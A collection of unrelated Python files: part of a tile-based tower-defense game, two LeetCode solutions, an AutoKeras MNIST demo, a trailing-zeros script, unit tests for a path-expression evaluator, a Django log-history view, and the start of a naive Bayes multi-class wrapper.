                elif(self.movestate==self.UP_RUN and FieldSet[int((self.x-25)/50)][int((self.y-25)/50)+1].state==1):
                    self.movestate = self.RIGHT_RUN
                else:
                    pass
            # Take player melee damage when close, mid-swing (attackframe>2),
            # and standing on a road tile matching the swing direction.
            if math.sqrt((self.x-character.x)*(self.x-character.x)+(self.y-character.y)*(self.y-character.y))<50:
                if character.attackdir==3 and character.attack==True and character.attackframe>2:
                    if (FieldSet[int ((self.x - 25) / 50)+1][int ((self.y - 25) / 50)].state == 0):
                        self.hp-= character.damage
                elif character.attackdir==1 and character.attack==True and character.attackframe>2:
                    if (FieldSet[int ((self.x - 25) / 50)][int ((self.y - 25) / 50)].state == 0):
                        self.hp -= character.damage
                elif character.attackdir== 2 and character.attack==True and character.attackframe>2:
                    if (FieldSet[int ((self.x - 25) / 50)][int ((self.y - 25) / 50)+1].state == 0):
                        self.hp -= character.damage
                elif character.attackdir == 0 and character.attack==True and character.attackframe>2:
                    if (FieldSet[int ((self.x - 25) / 50)][int ((self.y - 25) / 50)].state == 0):
                        self.hp -= character.damage
                else:
                    pass
        # Dying: award money exactly once, then accumulate blood-fade time.
        if self.hp<0 and self.death==False:
            character.money += 30
        if self.hp<0:
            self.bloodtime+=self.bloodspeed*frame_time
            self.death = True
    def draw(self):
        if self.death==False:
            self.image.clip_draw (int(self.frame) * 50, self.movestate* 50, 50, 50, self.x, self.y, 50, 50)
            if self.attack==True:
                self.attackImage.clip_draw(int(self.attackframe)*50,0,50,50,self.x,self.y)
        else:
            # After death the sprite becomes a blood splat that fades out,
            # then the monster removes itself from the global set.
            self.image = load_image('Graphics\\Blood.png')
            self.image.opacify(1-self.bloodtime/50)
            self.image.draw(self.x,self.y)
            if(self.bloodtime>50):
                monsterSet.remove(self)
class Character:
    """The player: WASD movement, melee attack, two skills, a buff, and one turret."""
    global monsterSet
    global turret
    buffOnimage = None
    image = None
    hpimage1 = None
    hpimage2 = None
    attackimage = None
    attack = False
    ringimage = None
    SkillImage1 = None
    SkillImage2 = None
    cursorimage = None
    buffimage = None
    # Sprite-sheet rows; a standing state is its run state + 4.
    LEFT_RUN,LEFT_STAND, RIGHT_RUN, RIGHT_STAND,UP_RUN,UP_STAND,DOWN_RUN,DOWN_STAND = 2,6,1,5,0,4,3,7 #STAND = GO_STATE+4
    def __init__(self):
        self.m_x,self.m_y = 0,0   # mouse position used for skill targeting
        self.x, self.y = 625,300
        self.skillstate = 0       # 0 none, 1 bomb, 2 ice field
        self.skillframe= 0
        self.icetime=0
        self.buffOn = False
        self.money = 0
        self.buffTime = 0
        self.buffcoolTime = 0
        self.buffOn1 = False
        self.skillGo=False        # a skill is currently being cast
        self.skillcoolOn1 = True
        self.skillcoolOn2 = True
        self.damage = 5
        self.ringOn = False       # show the targeting ring/cursor
        self.hp = 1000
        self.frame = 0
        self.attackdir = 0
        self.cool1 = False
        self.buffframe = 0
        self.skillcooltime1 = 0
        self.cool2 = False
        self.skillcooltime2 = 0
        self.turretOn = False
        self.skillcoolOn_speed = 20
        self.skillice_frame = 20
        self.attackframe=0
        self.buff_frame_speed = 30
        self.skillframe_speed = 20
        self.move_speed = 100
        self.attack_speed = 30
        self.move_frame_speed = 10
        self.tron = False         # turret-placement mode
        self.state = self.DOWN_STAND
        if Character.image == None:
            Character.buffimage = load_image('Graphics\\buff.png')
            Character.ringimage = load_image('Graphics\\SkillRing.png')
            Character.image = load_image ('Graphics\\Character.png')
            Character.attackimage = load_image('Graphics\\attack.png')
            Character.hpimage1 =load_image('Graphics\\healthStatusBar.png')
            Character.hpimage2 =load_image('Graphics\\healthStatusBar1.png')
            Character.SkillImage1 = load_image('Graphics\\Ice_field.png')
            Character.SkillImage2 = load_image ('Graphics\\bomb.png')
            Character.cursorimage = load_image('Graphics\\cursor.png')
            Character.buffOnimage = load_image('Graphics\\BUFF_ON.png')
    def handle_event(self, event):
        """Route one SDL event to targeting, skill, buff, turret, movement, or attack."""
        # Track the mouse while the targeting ring is shown (y axis flipped).
        if event.type == SDL_MOUSEMOTION and self.ringOn==True and self.skillGo==False:
            self.m_x, self.m_y = event.x, 700 - event.y
        # Left click: cast the selected skill (if in 150px range and off
        # cooldown) or place the turret on a fire tile.
        if event.type == SDL_MOUSEBUTTONDOWN and self.skillstate==1 and self.skillGo==False \
                and math.sqrt((self.x-self.m_x)*(self.x-self.m_x)+(self.y-self.m_y)*(self.y-self.m_y))<150 and self.cool1 == False and self.tron==False:
            Sound_Manager.PlayEffectSound('Explosion')
            self.skillGo = True
            self.cool1 = True
            self.skillcoolOn1 = False
        elif event.type == SDL_MOUSEBUTTONDOWN and self.skillstate==2 and self.skillGo==False \
                and math.sqrt ((self.x - self.m_x) * (self.x - self.m_x) + (self.y - self.m_y) * (self.y - self.m_y))< 150 and self.cool2 == False and self.tron==False:
            Sound_Manager.PlayEffectSound('Ice_Field')
            self.skillGo = True
            self.cool2 = True
            self.skillcoolOn2 = False
        elif event.type == SDL_MOUSEBUTTONDOWN and self.turretOn==False and FieldSet[int(self.m_x/50)][int(self.m_y/50)].state==1 \
                and math.sqrt ((self.x - self.m_x) * (self.x - self.m_x) + (
                    self.y - self.m_y)) < 150:
            # NOTE(review): the y-term in the range check above is not squared,
            # unlike the sibling checks -- looks like a bug; confirm intent.
            Sound_Manager.PlayEffectSound('Make_Turret')
            self.turret = Turret(int(self.m_x/50),int(self.m_y/50))
            self.money-=350
            self.turretOn = True
        # Number keys: 1/2 arm a skill, 3 starts the buff, 4 enters turret mode.
        if (event.type, event.key) == (SDL_KEYDOWN, SDLK_1) and self.skillGo==False and self.skillcoolOn1==True :
            self.ringOn = True
            self.skillstate = 1
        elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_2) and self.skillGo==False and self.skillcoolOn2==True :
            self.ringOn = True
            self.skillstate = 2
        elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_3) and self.buffOn == False:
            Sound_Manager.PlayEffectSound('Buff_sound')
            self.buffOn = True
            self.buffOn1 = True
        elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_4) and self.turretOn ==False and self.money>350:
            self.tron = True
            self.ringOn=True
        elif (event.type, event.key) == (SDL_KEYUP, SDLK_1):
            self.ringOn = False
        elif (event.type, event.key) == (SDL_KEYUP, SDLK_2):
            self.ringOn = False
        elif (event.type, event.key) == (SDL_KEYUP, SDLK_4):
            self.tron = False
            self.ringOn = False
        # WASD: set the attack facing and switch between run/stand states.
        if (event.type, event.key) == (SDL_KEYDOWN, SDLK_a):
            self.attackdir = 1
            if self.state in (self.RIGHT_STAND, self.LEFT_STAND,self.UP_STAND,self.DOWN_STAND):
                self.state = self.LEFT_RUN
            elif self.state in (self.RIGHT_RUN,self.UP_RUN,self.DOWN_RUN):
                self.state = self.LEFT_RUN
        elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_d):
            self.attackdir = 3
            if self.state in (self.RIGHT_STAND, self.LEFT_STAND,self.UP_STAND,self.DOWN_STAND):
                self.state = self.RIGHT_RUN
            elif self.state in (self.LEFT_RUN,self.UP_RUN,self.DOWN_RUN):
                self.state = self.RIGHT_RUN
        elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_w):
            self.attackdir = 2
            if self.state in (self.RIGHT_STAND, self.LEFT_STAND,self.UP_STAND,self.DOWN_STAND):
                self.state = self.UP_RUN
            elif self.state in (self.RIGHT_RUN,self.LEFT_RUN,self.DOWN_RUN):
                self.state = self.UP_RUN
        elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_s):
            self.attackdir = 0
            if self.state in (self.RIGHT_STAND, self.LEFT_STAND,self.UP_STAND,self.DOWN_STAND):
                self.state = self.DOWN_RUN
            elif self.state in (self.LEFT_RUN,self.UP_RUN,self.RIGHT_RUN):
                self.state = self.DOWN_RUN
        elif (event.type, event.key) == (SDL_KEYUP, SDLK_a):
            if self.state in (self.LEFT_RUN,):
                self.state = self.LEFT_STAND
        elif (event.type, event.key) == (SDL_KEYUP, SDLK_d):
            if self.state in (self.RIGHT_RUN,):
                self.state = self.RIGHT_STAND
        elif (event.type, event.key) == (SDL_KEYUP, SDLK_w):
            if self.state in (self.UP_RUN,):
                self.state = self.UP_STAND
        elif (event.type, event.key) == (SDL_KEYUP, SDLK_s):
            if self.state in (self.DOWN_RUN,):
                self.state = self.DOWN_STAND
        # Space swings the melee attack.
        if (event.type,event.key)==(SDL_KEYDOWN,SDLK_SPACE):
            Sound_Manager.PlayEffectSound('Strike')
            self.attack = True
    def update(self,frame_time): # fractional parts are simply truncated..
        global FieldSet
        if self.turretOn==True:
            self.turret.update(frame_time)
        if self.buffOn == True:
            self.buffcoolTime += frame_time*self.skillcoolOn_speed
            self.buffTime += frame_time*self.skillcoolOn_speed
            self.buffframe += frame_time
            if (self.buffcoolTime > 300): # buff skill cooldown = 300 ticks
                self.buffOn = False
                self.buffcoolTime = 0
                self.buffframe = 0
                self.buffTime=0
            # Damage is boosted (15) for the first half of the buff window.
            if (self.buffTime > 150):
                self.damage = 5
                self.buffOn1 = False
            elif (self.buffTime<150):
                self.damage = 15
        if(self.cool1==True):
            self.skillcooltime1+= frame_time*self.skillcoolOn_speed
            if(self.skillcooltime1>150): # explosion skill cooldown 150 ticks
                self.cool1 = False
                self.skillcoolOn1=True
                self.skillcooltime1=0
        if(self.cool2==True):
            self.skillcooltime2+= frame_time*self.skillcoolOn_speed
            if(self.skillcooltime2>150): # ice field skill cooldown 150 ticks
                self.skillcoolOn2=True
                self.cool2 = False
                self.skillcooltime2=0
        if(self.attack==True):
            self.attackframe += frame_time*self.attack_speed
            if (self.attackframe > 3):
                self.attackframe = 0
                self.attack = False
        # States 0..3 are run states: animate and move, blocked by fire tiles
        # and clamped to the playfield.
        if self.state < self.DOWN_RUN+1:
            self.frame = (self.frame+self.move_frame_speed*frame_time)%4
            if self.state == self.RIGHT_RUN:
                if FieldSet[int((self.x-25)/50)+1][int((self.y-25)/50)].state==0 :
                    self.x = min (700, self.x + frame_time*self.move_speed)
            elif self.state == self.LEFT_RUN:
                if FieldSet[int((self.x-25)/50)][int((self.y-25)/50)].state==0 :
                    self.x = max (0, self.x - frame_time*self.move_speed)
            elif self.state == self.UP_RUN:
                if FieldSet[int((self.x-25)/50)][int((self.y-25)/50)+1].state==0 :
                    self.y = min (700, self.y + frame_time*self.move_speed)
            elif self.state == self.DOWN_RUN:
                if FieldSet[int((self.x-25)/50)][int((self.y-25)/50)].state==0 :
                    self.y = max (0, self.y - frame_time*self.move_speed)
        # Take damage from every live monster mid-attack within 50px.
        for M in monsterSet:
            if M.attack==True and M.attackframe>7 and math.sqrt((M.x-self.x)*(M.x-self.x)+(M.y-self.y)*(M.y-self.y))<50 and M.death==False:
                self.hp-=M.damage
        # Advance skill animations: bomb ends after frame 8, ice after 50 ticks.
        if self.skillstate==1 and self.skillGo==True:
            self.skillframe+=self.skillframe_speed*frame_time
            if(self.skillframe>8):
                self.skillframe=0
                self.skillGo=False
        if self.skillstate==2 and self.skillGo==True:
            self.skillframe=(self.skillframe+self.skillframe_speed*frame_time)%8
            self.icetime+=self.skillice_frame*frame_time
            if(self.icetime>50): # ice field skill duration
                self.skillframe=0
                self.icetime=0
                self.skillGo=False
        if self.hp<0:
            game_framework.change_state(GameOver)
    def draw(self):
        if self.buffOn1==True:
            self.buffOnimage.draw(500,650)
        if self.turretOn == True:
            self.turret.draw()
        # Targeting ring and cursor while choosing a skill/turret target.
        if self.ringOn==True:
            self.ringimage.draw(self.x,self.y)
            self.cursorimage.draw(self.m_x,self.m_y)
        # HP bar above the character (fill width scaled to hp/20).
        self.hpimage2.draw (self.x, self.y + 30, 50, 20)
        self.hpimage1.draw (self.x + (50 - self.hp/20)/2, self.y + 30, self.hp/20, 20)
        if self.attack==False:
            # Rows 0-3 hold run frames; standing states reuse row (state-4).
            if(self.state<4):
                self.image.clip_draw (int(self.frame) * 50, self.state * 50, 50, 50, self.x, self.y,50,50)
            else:
                self.image.clip_draw (int(self.frame)* 50, int(self.state-4) * 50, 50, 50, self.x, self.y,50,50)
        else:
            self.attackimage.clip_draw (self.attackdir*50, int(self.attackframe) * 50, 50, 50, self.x, self.y, 50, 50) # up
        # Active skill effects are drawn at the mouse target position.
        if self.skillstate==1 and self.skillGo==True:
            self.SkillImage2.clip_draw(int(self.skillframe)%8 * 200, 0, 200, 200, self.m_x, self.m_y)
        if self.skillstate==2 and self.skillGo==True:
            self.SkillImage1.clip_draw(int(self.skillframe)%8 * 200, 0, 200, 200, self.m_x, self.m_y)
        if self.buffOn==True and self.buffframe<10:
            self.buffimage.clip_draw(int(self.buffframe*self.buff_frame_speed)*100,0,100,100,self.x,self.y+20)
class Turret:
    """Stationary tower that periodically fires 4 missiles, one per direction."""
    # NOTE(review): ``global missile`` in the class body makes the
    # ``missile = []`` assignment below create a *module-level* list, which is
    # what the methods (and the Missile class) reference -- confirm intended.
    global missile
    image = None
    missile = []
    def __init__(self,x,y):
        self.frame = 0
        self.x,self.y = x,y  # tile coordinates (scaled by 50 when drawing)
        self.launchTime = 0
        self.frameSpeed = 20
        if Turret.image==None:
            # NOTE(review): assigns the *instance* attribute, so Turret.image
            # stays None and a second turret would reload (or crash drawing);
            # only one turret exists in the game, so this goes unnoticed.
            self.image = load_image('Graphics\\Turret.png')
    def update(self,frame_time):
        self.launchTime +=1
        self.frame = (self.frame+frame_time*self.frameSpeed)%25
        # Every 1000th update, launch one missile in each of the 4 directions.
        if(self.launchTime%1000==0):
            missile.append(Missile (self.x*50+25,self.y*50+25,0))
            missile.append (Missile (self.x*50+25, self.y*50+25, 1))
            missile.append (Missile (self.x*50+25, self.y*50+25, 2))
            missile.append (Missile (self.x*50+25, self.y*50+25, 3))
        for M in missile:
            M.update(frame_time)
    def draw(self):
        self.image.clip_draw(int(self.frame)*80,0,80,80,self.x*50+25,self.y*50+25,50,50)
        for M in missile:
            M.draw()
class Missile:
    """Turret projectile: flies in one of 4 directions, explodes on monsters."""
    image = None
    image_Explode =None
    global monsterSet
    global missile
    def __init__(self,x,y,dir):
        self.frame = 0
        self.x,self.y = x,y
        self.speed = 200
        self.explodeframe = 0
        self.explodespeed = 20
        self.explode = False
        self.dir = dir        # 0 right, 1 left, 2 up, 3 down
        self.remove = False   # guards against double-removal from ``missile``
        if Missile.image==None:
            self.image = load_image ('Graphics\\Missile.png')
            self.image_Explode = load_image('Graphics\\MissileExplode.png')
    def update(self,frame_time):
        self.frame = (self.frame+frame_time*self.speed)%4
        # Travel in the launch direction until exploding.
        if self.explode==False:
            if self.dir==0:
                self.x+=frame_time*self.speed
            elif self.dir==1:
                self.x-=frame_time*self.speed
            elif self.dir==2:
                self.y+=frame_time*self.speed
            elif self.dir==3:
                self.y-=frame_time*self.speed
        if self.explode==True:
            self.explodeframe+=frame_time*self.explodespeed
        # Despawn far off-screen; otherwise check collisions with monsters.
        if (self.x > 1000 or self.x < -100 or self.y < -100 or self.y > 1000) and self.remove==False:
            missile.remove (self)
            self.remove=True
        else:
            for M in monsterSet:
                # NOTE(review): the y-term below is not squared -- the distance
                # check looks like sqrt(dx*dx + dy); likely a bug, confirm.
                if (math.sqrt ((self.x - M.x) * (self.x - M.x) + (
                        self.y - M.y)) < 25) and self.remove==False and M.death==False:
                    self.explode=True
                    # After the explosion animation, remove and apply damage.
                    if self.explodeframe>5:
                        missile.remove(self)
                        self.remove=True
                        M.hp -= 10
    def draw(self):
        if (self.explode==True):
            self.image_Explode.clip_draw(int(self.explodeframe)*100,0,100,100,self.x,self.y)
        else:
            self.image.clip_draw (int(self.frame) * 50, 0, 50, 50, self.x, self.y, 50, 50)
class FireBall:
    """Hazard projectile flying left-to-right; damages the character or home on contact."""
    global FireballSet
    image = None
    def __init__(self,x,y):
        self.x,self.y = x,y
        self.speed = 200
        self.framespeed = 100
        self.frame=0
        self.remove = False  # guards against double-removal from FireballSet
        if FireBall.image==None:
            FireBall.image = load_image('Graphics\\Fire_Ball.png')
    def draw(self):
        self.image.clip_draw (int (self.frame) * 50, 0, 50, 50, self.x, self.y, 50, 50)
    def update(self,frame_time):
        self.frame = (self.frame+frame_time*self.framespeed)%3
        self.x+=frame_time*self.speed
        # Despawn off the right edge.
        if self.x>1000 and self.remove==False:
            self.remove=True
            FireballSet.remove(self)
        # Hit the character (30 damage, 25px radius).
        if math.sqrt((character.x-self.x)*(character.x-self.x)+(character.y-self.y)*(character.y-self.y))<25 and self.remove==False:
            character.hp-=30
            self.remove=True
            FireballSet.remove(self)
        # Hit the home (50 damage, 50px radius).
        if math.sqrt((home.x-self.x)*(home.x-self.x)+(home.y-self.y)*(home.y-self.y))<50 and self.remove==False:
            home.hp-=50
            self.remove=True
            FireballSet.remove(self)
class UI:
    """Heads-up display: money counter plus the four ability icons."""
    font = None
    image = None
    image_BOMB_UI = None
    image_ICE_UI = None
    image_BUFF_UI = None
    image_BOMB_CLOSE_UI = None
    image_ICE_CLOSE_UI = None
    image_BUFF_CLOSE_UI = None
    image_Turret_UI = None
    image_Turret_CLOSE_UI = None
    def __init__(self):
        self.x = 0
        self.y = 0
        UI.font = load_font('hjbmb.ttf')
        # The "_CLOSE_" variants are the greyed-out (unavailable) icons.
        if self.image==None:
            self.image_BOMB_UI = load_image('Graphics\\Fire_UI.png')
            self.image_ICE_UI = load_image('Graphics\\ICE_UI.png')
            self.image_BUFF_UI = load_image('Graphics\\Buff_UI.png')
            self.image_BOMB_CLOSE_UI = load_image('Graphics\\FIRE_CLOSE_UI.png')
            self.image_ICE_CLOSE_UI = load_image('Graphics\\ICE_CLOSE_UI.png')
            self.image_BUFF_CLOSE_UI = load_image('Graphics\\BUFF_CLOSE_UI.png')
            self.image_Turret_CLOSE_UI = load_image('Graphics\\TURRET_CLOSE_UI.png')
            self.image_Turret_UI = load_image('Graphics\\Turret_UI.png')
    def draw(self):
        # Money readout and the four icons along the top of the screen.
        UI.font.draw(500,600,'Money:%d'%character.money,(100,0,0))
        self.image_BUFF_UI.draw(300,650)
        self.image_ICE_UI.draw(200,650)
        self.image_BOMB_UI.draw(100,650)
        self.image_Turret_UI.draw(400,650)
        # Overlay the greyed-out icon for anything on cooldown / unaffordable.
        if character.skillcoolOn1==False:
            self.image_BOMB_CLOSE_UI.draw(100,650)
        if character.skillcoolOn2==False:
            self.image_ICE_CLOSE_UI.draw(200,650)
        if character.buffOn==True:
            self.image_BUFF_CLOSE_UI.draw(300,650)
        if character.turretOn==True or character.money<350:
            self.image_Turret_CLOSE_UI.draw(400,650)
    def update(self):
        pass
def enter():
    """State entry: load sound/graphics, build the 14x14 map, reset all objects."""
    global Bgm
    global FieldSet
    global character
    global home
    global monster
    global cursorimage
    global MakeTime
    global monsterSet
    global monster_level
    global stageimage1
    global stageimage2
    global stageimage3
    global cursorMove
    global ui
    global FireballSet
    global current_time
    global FIreball_time
    Sound_Manager.LoadSoundData()
    Bgm = load_wav('Sound\\HellMode.wav')
    Bgm.set_volume(8)
    Bgm.repeat_play()
    current_time = get_time()
    ui = UI()
    cursorMove = False
    stageimage1 = load_image('Graphics\\Stage1.png')
    stageimage2 = load_image ('Graphics\\Stage2.png')
    stageimage3 = load_image ('Graphics\\Stage3.png')
    cursorimage = load_image('Graphics\\cursor.png')
    monster_level = 0
    home = Home()
    character = Character()
    monsterSet=[]
    FireballSet = []
    monster = Monster(0)
    MakeTime = 0
    FIreball_time = 0
    # 14x14 grid of tiles; everything starts as fire (state 1).
    FieldSet = [[0 for col in range(14)] for row in range(14)]
    for y in range (0, 14):
        for x in range (0, 14):
            FieldSet[y][x]=Field(y * 50 + 25, x * 50 + 25, 1)
    # Carve the walkable road (state 0) tile by tile.
    Field.Change (FieldSet[5][2], 0)
    Field.Change (FieldSet[4][2], 0)
    Field.Change (FieldSet[10][2], 0)
    Field.Change (FieldSet[11][2], 0)
    for i in range(0,3):
        Field.Change(FieldSet[i][5],0)
    for i in range(0,4):
        Field.Change(FieldSet[3][5-i],0)
    for i in range(0,3):
        Field.Change(FieldSet[3+i][1],0)
    for i in range(1,8):
        Field.Change(FieldSet[6][i],0)
    for i in range(0,3):
        Field.Change(FieldSet[6+i][8],0)
    for i in range(0,7):
        Field.Change(FieldSet[9][8-i],0)
    for i in range(0,4):
        Field.Change(FieldSet[9+i][1],0)
    for i in range(0,7):
        Field.Change(FieldSet[12][1+i],0)
def exit():
    """Release the background music when leaving this state."""
    global Bgm
    del Bgm
def pause():
    """Release the background music while this state is paused."""
    global Bgm
    del Bgm
def resume():
    """Nothing needs restoring when re-entering this state."""
    pass
# Main-loop flag: cleared by quit/ESC events, checked (and reset) in update().
running = True
def handle_events():
    """Drain SDL events: quit/ESC stop the loop, the rest go to the character."""
    global character
    global running
    events = get_events()
    for event in events:
        if event.type == SDL_QUIT:
            running = False
        elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:
            running = False
        else:
            character.handle_event(event)
def get_frame_time():
    """Return seconds elapsed since the previous call and advance the clock."""
    global current_time
    now = get_time()
    frame_time = now - current_time
    current_time = now
    return frame_time
def update():
    """Per-frame game logic: spawn waves/fireballs, advance every object."""
    global running
    global MakeTime
    global monsterSet
    global monster_level
    global home
    global FireballSet
    global FIreball_time
    MakeTime +=1
    frame_time = get_frame_time()
    FIreball_time +=100*frame_time
    # NOTE(review): debug print left in -- spams the console every frame.
    print(FIreball_time)
    # Roughly every second of accumulated time, launch a fireball at a
    # random row from the left edge.
    if(FIreball_time>100):
        FireballSet.append (FireBall (0, random.randint (1, 10) * 50 + 25))
        FIreball_time=0
    # Three monster waves; clearing all monsters advances the level,
    # surviving all three levels wins the game.
    if monster_level<3:
        if(MakeTime<3000):
            if(MakeTime%250==1):
                monsterSet.append(Monster(monster_level))
        if (len (monsterSet) == 0):
            monster_level +=1
            MakeTime=0
    else:
        game_framework.change_state(GameWin)
    for M in monsterSet:
        M.update(frame_time)
    for F in FireballSet:
        F.update(frame_time)
    home.update()
    character.update(frame_time)
    # ESC/quit returns to the title screen (and re-arms the flag).
    if not running:
        game_framework.change_state(title_state)
        running=True
def draw():
    """Render one frame: tiles, stage banner, UI, home, monsters, fireballs, player."""
    global ui
    global FieldSet
    global monster_level
    global monsterSet
    global stageimage1
    global stageimage2
    global stageimage3
    global FireballSet
    clear_canvas()
    for y in range(0,14):
        for x in range (0, 14):
            FieldSet[y][x].draw()
    # Stage banner matching the current monster level.
    if (monster_level == 0):
        stageimage1.draw (600, 650)
    elif (monster_level == 1):
        stageimage2.draw (600, 650)
    elif (monster_level == 2):
        stageimage3.draw (600, 650)
    ui.draw()
    home.draw()
    for M in monsterSet:
        M.draw()
    for F in FireballSet:
        F.draw()
    character.draw()
    update_canvas()
# 119. Pascal's Triangle II
#
# Given an index k, return the kth row of the Pascal's triangle.
#
# For example, given k = 3,
# Return [1,3,3,1].
class Solution(object):
    def getRow(self, rowIndex):
        """Return row *rowIndex* (0-based) of Pascal's triangle.

        :type rowIndex: int
        :rtype: List[int]

        Uses O(rowIndex) extra space by rebuilding only the current row,
        instead of materialising the whole triangle as before.
        """
        row = [1]
        for _ in range(rowIndex):
            # Each interior entry is the sum of the two entries above it.
            row = [1] + [row[j] + row[j + 1] for j in range(len(row) - 1)] + [1]
        return row
if __name__ == '__main__':
    # Quick self-check when run as a script.
    solution = Solution()
    assert solution.getRow(3) == [1, 3, 3, 1]
    assert solution.getRow(0) == [1]
import numpy as np
import tensorflow as tf
import autokeras as ak
from tensorflow.keras.datasets import mnist
# MNIST image-classification demo using AutoKeras architecture search.
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# Add the channel axis and scale pixel values into [0, 1).
# NOTE(review): divides by 256 rather than the conventional 255 -- confirm intended.
x_train = x_train.reshape(60000, 28, 28, 1).astype('float32') / 256.
x_test = x_test.reshape(10000, 28, 28, 1).astype('float32') / 256.
from tensorflow.keras.utils import to_categorical
# One-hot encode the digit labels.
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
# Search over at most 2 candidate architectures.
model = ak.ImageClassifier(
    # overwrite=True,
    max_trials=2
)
model.fit(x_train, y_train, epochs=3)
results = model.evaluate(x_test, y_test)
print(results)
|
# Read N integers and print the largest exponent e (0..9) such that every
# number is divisible by 10**e; prints nothing when all numbers are
# divisible by 10**10.
N = int(input())
numbers = [int(input()) for _ in range(N)]
stop = False
exponent = 0
for power in range(1, 11):
    for value in numbers:
        if value % (10 ** power) != 0:
            # Some value lacks this many trailing zeros -> answer found.
            print(exponent)
            stop = True
            break
    if stop:
        break
    exponent += 1
|
import unittest
import os
from ..BaseTestCase import BaseTestCase
from centipede.ExpressionEvaluator import ExpressionEvaluator
from centipede.ExpressionEvaluator import ExpressionNotFoundError
class PathTest(BaseTestCase):
    """Test Path expressions."""
    # Fixture paths shared by the tests below (name-mangled class attributes).
    __path = "/test/path/example.ext"
    __testRFindPath = os.path.join(BaseTestCase.dataDirectory(), 'config', 'test.json')
    def testDirname(self):
        """
        Test that the dirname expression works properly.
        """
        result = ExpressionEvaluator.run("dirname", self.__path)
        self.assertEqual(result, "/test/path")
    def testParentDirname(self):
        """
        Test that the parentdirname expression works properly.
        """
        result = ExpressionEvaluator.run("parentdirname", self.__path)
        self.assertEqual(result, "/test")
    def testBasename(self):
        """
        Test that the basename expression works properly.
        """
        result = ExpressionEvaluator.run("basename", self.__path)
        self.assertEqual(result, "example.ext")
    def testRFindPath(self):
        """
        Test that the rfind expression works properly.
        """
        # rfindpath searches upward from __testRFindPath for test.txt.
        result = ExpressionEvaluator.run('rfindpath', 'test.txt', self.__testRFindPath)
        testPath = os.path.join(BaseTestCase.dataDirectory(), 'test.txt')
        self.assertEqual(result, testPath)
    def testFindPath(self):
        """
        Test that the find expression works properly.
        """
        # findpath searches downward from the data directory.
        result = ExpressionEvaluator.run("findpath", 'TestCrawler.py', BaseTestCase.dataDirectory())
        testPath = os.path.join(BaseTestCase.dataDirectory(), 'config', 'crawlers', 'TestCrawler.py')
        self.assertEqual(result, testPath)
    def testRegistration(self):
        """
        Test that the expression registration works properly.
        """
        def myDummyExpression(a, b):
            return '{}-{}'.format(a, b)
        # Unknown name raises before registration, appears afterwards.
        self.assertRaises(ExpressionNotFoundError, ExpressionEvaluator.run, "dummy")
        ExpressionEvaluator.register("dummy", myDummyExpression)
        self.assertIn("dummy", ExpressionEvaluator.registeredNames())
    def testParseRun(self):
        """
        Test that running an expression through string parsing works.
        """
        result = ExpressionEvaluator.parseRun("dirname {}".format(self.__path))
        self.assertEqual(result, "/test/path")
        # Non-string input must be rejected.
        self.assertRaises(AssertionError, ExpressionEvaluator.parseRun, True)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
from django.contrib.admin.models import LogEntry
from rest_framework.views import APIView
from rest_framework.response import Response
from .serializers import LogsSerializer, LogEntrySerializer
from .models import *
class WeavedinLogsView(APIView):
    """Return items (optionally for one user) with their admin LogEntry history."""
    allowed_methods = ['GET']
    serializer_class = LogsSerializer

    def get_object(self, request, user_id):
        """Fetch the Item owned by *user_id*, or raise Http404."""
        try:
            return Item.objects.get(user=user_id)
        except Item.DoesNotExist:
            raise Http404

    def get(self, request, user_id=None):
        """GET handler.

        Optional query params ``start_time``/``end_time`` bound the LogEntry
        ``action_time`` window; optional *user_id* restricts the item set.
        """
        start_time = request.query_params.get('start_time', None)
        end_time = request.query_params.get('end_time', None)
        # BUG FIX: build the queryset incrementally -- previously a request
        # with both bounds discarded the start filter, and a request with
        # neither bound crashed on an unbound ``log_entry``.
        log_entry = LogEntry.objects.all()
        if start_time:
            log_entry = log_entry.filter(action_time__gte=start_time)
        if end_time:
            log_entry = log_entry.filter(action_time__lte=end_time)
        if user_id:
            items = Item.objects.filter(user=user_id)
        else:
            items = Item.objects.all()
        response = []
        for item in items:
            item_data = LogsSerializer(item).data
            log_entries = log_entry.filter(object_id=item.id)
            item_data['history'] = LogEntrySerializer(log_entries, many=True).data
            # BUG FIX: accumulate entries across *all* variants instead of
            # overwriting 'variant_history' with only the last variant's data.
            variant_history = []
            for variant in item.variant_set.all():
                variant_entries = log_entry.filter(object_id=variant.id)
                variant_history.extend(LogEntrySerializer(variant_entries, many=True).data)
            item_data['variant_history'] = variant_history
            response.append(item_data)
        return Response(response)
|
class Solution(object):
    def evalRPN(self, tokens):
        """Evaluate an expression in Reverse Polish Notation.

        :type tokens: List[str]
        :rtype: int

        Division truncates toward zero (LeetCode semantics), matching the
        original ``int(float(l)/r)`` trick.
        """
        stack = []
        for token in tokens:
            # Numbers are pushed; anything unparseable must be an operator.
            # BUG FIX: catch ValueError specifically instead of a bare except.
            try:
                stack.append(int(token))
                continue
            except ValueError:
                pass
            right = stack.pop()
            left = stack.pop()
            if token == '+':
                stack.append(left + right)
            elif token == '-':
                stack.append(left - right)
            elif token == '*':
                stack.append(left * right)
            else:  # token == '/'
                assert token == '/'
                # True division then int() truncates toward zero, unlike //.
                stack.append(int(left / right))
        assert len(stack) == 1
        return stack[0]
|
import time
import shared_library
from hw1_naive_bayes import NaiveBayesClassifier
# Set constants
iv_count = 6 # Number of features in data set
validation_count = 10  # folds used for n-fold cross-validation
prefix = "../datafiles/hw4_" # Used if data files are not in same directory as code
training_set_loc = prefix + 'training_set.csv'
testing_set_loc = prefix + 'test_set.csv'
results_loc = prefix + 'output_set_binary_multiclasser.csv'
class MultiClassNaiveBayesClassifier:
    """One-vs-one multi-class wrapper around the binary NaiveBayesClassifier.

    A binary classifier is trained for every unordered pair of labels;
    prediction is accuracy-weighted voting across all pairwise classifiers.
    """

    def __init__(self, best_item_loc=False):
        # NOTE(review): best_item_loc is accepted but never used; presumably
        # required by the shared_library.main driver signature -- confirm.
        self.accuracies = {}   # accuracies[dv_1][dv_2]: validation accuracy of that pair's classifier
        self.classifiers = {}  # classifiers[dv_1][dv_2]: trained pairwise classifier
